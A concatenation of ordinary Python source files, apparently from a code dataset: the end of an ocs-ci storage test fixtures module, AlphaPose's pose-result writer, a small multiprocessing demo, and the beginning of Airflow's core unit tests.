vdict[new_kmsid] = vdict.pop(old_key)
vdict[new_kmsid]["VAULT_BACKEND_PATH"] = vault_resource_name
vdict[new_kmsid]["VAULT_NAMESPACE"] = vault_resource_name
vault.kmsid = vault_resource_name
if kv_version == "v1":
vdict[new_kmsid]["VAULT_BACKEND"] = "kv"
else:
vdict[new_kmsid]["VAULT_BACKEND"] = "kv-v2"
KMS.update_csi_kms_vault_connection_details(vdict)
except CommandFailed as cfe:
if "not found" not in str(cfe):
raise
else:
vault.kmsid = "1-vault"
vault.create_vault_csi_kms_connection_details(kv_version=kv_version)
return vault
def finalizer():
"""
Remove the vault config from csi-kms-connection-details configMap
"""
if len(KMS.get_encryption_kmsid()) > 1:
KMS.remove_kmsid(vault.kmsid)
# Delete the resources in vault
vault.remove_vault_backend_path()
vault.remove_vault_policy()
vault.remove_vault_namespace()
request.addfinalizer(finalizer)
return factory
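# --- Illustrative usage sketch (editor's addition) ---
# Typical consumption of pv_encryption_kms_setup_factory: create the Vault-backed
# KMS configuration for KV engine v2 and reuse the returned Vault object's kmsid
# when building an encrypted storage class. The storage-class call in the comment
# below is an assumption, not an API defined in this file.
def _example_pv_encryption_setup_usage(pv_encryption_kms_setup_factory):
    vault = pv_encryption_kms_setup_factory(kv_version="v2")
    # vault.kmsid now refers to the entry added to csi-kms-connection-details;
    # a test would typically pass it on, e.g.
    #   storageclass_factory(encrypted=True, encryption_kms_id=vault.kmsid)
    assert vault.kmsid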
@pytest.fixture(scope="class")
def cephblockpool_factory_ui_class(request, setup_ui_class):
return cephblockpool_factory_ui_fixture(request, setup_ui_class)
@pytest.fixture(scope="session")
def cephblockpool_factory_ui_session(request, setup_ui_session):
return cephblockpool_factory_ui_fixture(request, setup_ui_session)
@pytest.fixture(scope="function")
def cephblockpool_factory_ui(request, setup_ui):
return cephblockpool_factory_ui_fixture(request, setup_ui)
def cephblockpool_factory_ui_fixture(request, setup_ui):
"""
    This function creates a new cephblockpool
"""
instances = []
def factory(
replica=3,
compression=False,
):
"""
Args:
            replica (int): replica size of the pool; 2 and 3 are supported for now
compression (bool): True to enable compression otherwise False
Return:
(ocs_ci.ocs.resource.ocs) ocs object of the CephBlockPool.
"""
blockpool_ui_object = BlockPoolUI(setup_ui)
pool_name, pool_status = blockpool_ui_object.create_pool(
replica=replica, compression=compression
)
if pool_status:
log.info(
f"Pool {pool_name} with replica {replica} and compression {compression} was created and "
f"is in ready state"
)
ocs_blockpool_obj = create_ocs_object_from_kind_and_name(
kind=constants.CEPHBLOCKPOOL,
resource_name=pool_name,
)
instances.append(ocs_blockpool_obj)
return ocs_blockpool_obj
else:
blockpool_ui_object.take_screenshot()
if pool_name:
instances.append(
create_ocs_object_from_kind_and_name(
kind=constants.CEPHBLOCKPOOL, resource_name=pool_name
)
)
raise PoolDidNotReachReadyState(
f"Pool {pool_name} with replica {replica} and compression {compression}"
f" did not reach ready state"
)
def finalizer():
"""
        Delete the cephblockpool from the UI and, if that fails, from the CLI
"""
for instance in instances:
try:
instance.get()
except CommandFailed:
log.warning("Pool is already deleted")
continue
blockpool_ui_obj = BlockPoolUI(setup_ui)
if not blockpool_ui_obj.delete_pool(instance.name):
instance.delete()
raise PoolNotDeletedFromUI(
f"Could not delete block pool {instances.name} from UI."
f" Deleted from CLI"
)
request.addfinalizer(finalizer)
return factory
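# --- Illustrative usage sketch (editor's addition) ---
# A UI test creating a compressed, 3-replica CephBlockPool through the factory;
# the factory only returns once the pool reports ready state in the UI.
def _example_blockpool_ui_usage(cephblockpool_factory_ui):
    pool_obj = cephblockpool_factory_ui(replica=3, compression=True)
    assert pool_obj.name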
@pytest.fixture(scope="class")
def storageclass_factory_ui_class(
request, cephblockpool_factory_ui_class, setup_ui_class
):
return storageclass_factory_ui_fixture(
request, cephblockpool_factory_ui_class, setup_ui_class
)
@pytest.fixture(scope="session")
def storageclass_factory_ui_session(
request, cephblockpool_factory_ui_session, setup_ui_session
):
return storageclass_factory_ui_fixture(
request, cephblockpool_factory_ui_session, setup_ui_session
)
@pytest.fixture(scope="function")
def storageclass_factory_ui(request, cephblockpool_factory_ui, setup_ui):
return storageclass_factory_ui_fixture(request, cephblockpool_factory_ui, setup_ui)
def storageclass_factory_ui_fixture(request, cephblockpool_factory_ui, setup_ui):
"""
    This function creates a new storageclass
"""
instances = []
def factory(
provisioner=constants.OCS_PROVISIONERS[0],
compression=False,
replica=3,
create_new_pool=False,
encryption=False, # not implemented yet
reclaim_policy=constants.RECLAIM_POLICY_DELETE, # not implemented yet
default_pool=constants.DEFAULT_BLOCKPOOL,
existing_pool=None,
):
"""
Args:
            provisioner (str): The name of the provisioner. Default is openshift-storage.rbd.csi.ceph.com
            compression (bool): if create_new_pool is True, enable compression on the new pool.
            replica (int): if create_new_pool is True, replica size to set on the new pool.
            create_new_pool (bool): True to create a new pool with the factory.
            encryption (bool): enable PV encryption if True.
            reclaim_policy (str): Reclaim policy for the storageclass.
            default_pool (str): Pool to use when neither create_new_pool nor existing_pool is given.
            existing_pool (str): Name of an existing pool to use for the storageclass.
Return:
(ocs_ci.ocs.resource.ocs) ocs object of the storageclass.
"""
storageclass_ui_object = StorageClassUI(setup_ui)
if existing_pool is None and create_new_pool is False:
pool_name = default_pool
if create_new_pool is True:
pool_ocs_obj = cephblockpool_factory_ui(
replica=replica, compression=compression
)
pool_name = pool_ocs_obj.name
if existing_pool is not None:
pool_name = existing_pool
sc_name = storageclass_ui_object.create_storageclass(pool_name)
if sc_name is None:
log.error("Storageclass was not created")
raise StorageclassNotCreated(
"Storageclass is not found in storageclass list page"
)
else:
log.info(f"Storageclass created with name {sc_name}")
sc_obj = create_ocs_object_from_kind_and_name(
resource_name=sc_name, kind=constants.STORAGECLASS
)
instances.append(sc_obj)
log.info(f"{sc_obj.get()}")
return sc_obj
def finalizer():
for instance in instances:
try:
instance.get()
except CommandFailed:
log.warning("Storageclass is already deleted")
continue
storageclass_ui_obj = StorageClassUI(setup_ui)
if not storageclass_ui_obj.delete_rbd_storage_class(instance.name):
instance.delete()
raise StorageClassNotDeletedFromUI(
f"Could not delete storageclass {instances.name} from UI."
f"Deleted from CLI"
)
request.addfinalizer(finalizer)
return factory
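# --- Illustrative usage sketch (editor's addition) ---
# Creating a storage class backed by a freshly created 2-replica compressed pool.
def _example_storageclass_ui_usage(storageclass_factory_ui):
    sc_obj = storageclass_factory_ui(create_new_pool=True, replica=2, compression=True)
    assert sc_obj.name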
|
writer.py
|
import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms, write_json
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
class DataWriter():
def __init__(self, cfg, opt, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.video_save_opt = video_save_opt
self.eval_joints = EVAL_JOINTS
self.save_video = save_video
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
        # initialize the queue used to store per-frame pose estimation
        # results before they are written out
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_flow:
from trackers.PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
    def update(self):
        # keep a reference on self so results() can return the accumulated output
        self.final_result = final_result = []
norm_type = self.cfg.LOSS.get('NORM_TYPE', None)
hm_size = self.cfg.DATA_PRESET.HEATMAP_SIZE
if self.save_video:
            # initialize the file video stream, adapt output video resolution to original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
        # keep looping infinitely
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
if self.save_video:
stream.release()
write_json(final_result, self.opt.outputpath, form=self.opt.format, for_eval=self.opt.eval)
print("Results have been written to json.")
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None or len(boxes) == 0:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
assert hm_data.dim() == 4
#pred = hm_data.cpu().data.numpy()
if hm_data.size()[1] == 136:
self.eval_joints = [*range(0,136)]
elif hm_data.size()[1] == 26:
self.eval_joints = [*range(0,26)]
elif hm_data.size()[1] == 133:
self.eval_joints = [*range(0,133)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(hm_data[i][self.eval_joints], bbox, hm_shape=hm_size, norm_type=norm_type)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
if not self.opt.pose_track:
boxes, scores, ids, preds_img, preds_scores, pick_ids = \
pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
_result = []
for k in range(len(scores)):
_result.append(
{
'keypoints':preds_img[k],
'kp_score':preds_scores[k],
'proposal_score': torch.mean(preds_scores[k]) + scores[k] + 1.25 * max(preds_scores[k]),
'idx':ids[k],
'box':[boxes[k][0], boxes[k][1], boxes[k][2]-boxes[k][0],boxes[k][3]-boxes[k][1]]
}
)
result = {
'imgname': im_name,
'result': _result
}
if self.opt.pose_flow:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
final_result.append(result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, self.opt)
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
self.result_worker.join()
def terminate(self):
# directly terminate
self.result_worker.terminate()
def clear_queues(self):
self.clear(self.result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def results(self):
# return final result
print(self.final_result)
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
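# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# How a caller is expected to drive DataWriter: start the worker, enqueue one tuple
# per frame, then push the all-None sentinel via stop() so update() flushes the JSON
# results and exits. `cfg` and `opt` are assumed to come from AlphaPose's own config
# and argument parsing; `detection_results` is a hypothetical iterable yielding tuples
# in the order DataWriter.save() expects.
def example_writer_usage(cfg, opt, detection_results):
    writer = DataWriter(cfg, opt, save_video=False).start()
    for (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) in detection_results:
        # enqueue one frame's pose results; update() consumes them on the worker
        writer.save(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name)
    writer.stop()  # sends the sentinel and joins the worker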
|
multi.py
|
from multiprocessing import Process
def singleCount(cnt, name):
    # each process receives its own copy of cnt; plain ints are not shared
    for i in range(100000000):
        cnt += 1
        if i % 2500000 == 0:
            print(name, ':', i)
if __name__ == '__main__':
    cnt = 0
    name = ['hyunho1', 'hyunho2']
    p1 = Process(target=singleCount, args=(cnt, name[0]))
    p2 = Process(target=singleCount, args=(cnt, name[1]))
    p1.start()
    p2.start()
    p1.join()
    p2.join()
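# --- Illustrative sketch (editor's addition) ---
# Each process above increments its own copy of cnt, so the parent's counter never
# changes. If a single shared counter were wanted, multiprocessing.Value with its
# built-in lock is one way to do it:
from multiprocessing import Value
def sharedCount(counter, steps=1000000):
    for _ in range(steps):
        with counter.get_lock():  # serialize increments across processes
            counter.value += 1
def run_shared_example():
    counter = Value('i', 0)  # 'i' -> C int, initial value 0
    procs = [Process(target=sharedCount, args=(counter,)) for _ in range(2)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()
    print('total:', counter.value)  # expected: 2 * steps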
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
from pendulum import utcnow
import six
NUM_EXAMPLE_DAGS = 18
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
    def execute(self, *args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
if os.environ.get('KUBERNETES_VERSION') is None:
session = Session()
session.query(models.TaskInstance).filter_by(
dag_id=TEST_DAG_ID).delete()
session.query(models.TaskFail).filter_by(
dag_id=TEST_DAG_ID).delete()
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_relativedelta',
schedule_interval=delta)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
        Test scheduling a dag where a prior DagRun already exists with the
        same run_id that the next run would have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
